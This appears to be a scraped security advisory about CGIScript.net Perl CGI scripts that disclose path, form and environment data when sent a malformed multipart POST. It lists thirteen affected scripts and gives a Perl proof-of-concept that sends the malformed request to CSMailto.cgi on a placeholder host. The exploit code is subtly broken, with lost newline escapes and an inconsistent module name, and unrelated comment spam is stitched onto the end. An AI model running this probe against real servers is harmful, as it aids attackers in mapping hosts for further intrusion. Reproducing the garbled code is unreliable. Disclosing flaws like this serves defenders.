source: http://www.securityfocus.com/bid/4764/info
CGIScript.net provides various webmaster related tools and is maintained by Mike Barone and Andy Angrick.
It is possible to cause numerous scripts provided by CGIScript.net to disclose sensitive system information.
The following is a list of cgi scripts that are susceptible to this issue:
csBanner.cgi
csCreatePro.cgi
CSDownload.cgi
csFAQ.cgi
CSFiler.cgi
CSFileshare.cgi
CSGrid.cgi
CSIncludes.cgi
CSMailto.cgi
CSNews.cgi
CSNews.cgi (pro version)
CSRandomText.cgi
CSUpload.cgi
Path, form input, and environment variable information is disclosed when a malformed POST request is submitted. This information may aid the attacker in making further attacks against the host.
#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data
use strict;
use IO::Socket::Inet;
my $host = 'hostname.com';
my $path = '/cgi-script/CSMailto/CSMailto.cgi';
my $sock = IO::Socket::INET->new("$host:80");
print $sock "POST $pathn";
print $sock "Content-type: multipart/form-data;";
print $sock " boundary=--nn";
print <$sock>;
close($sock);
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666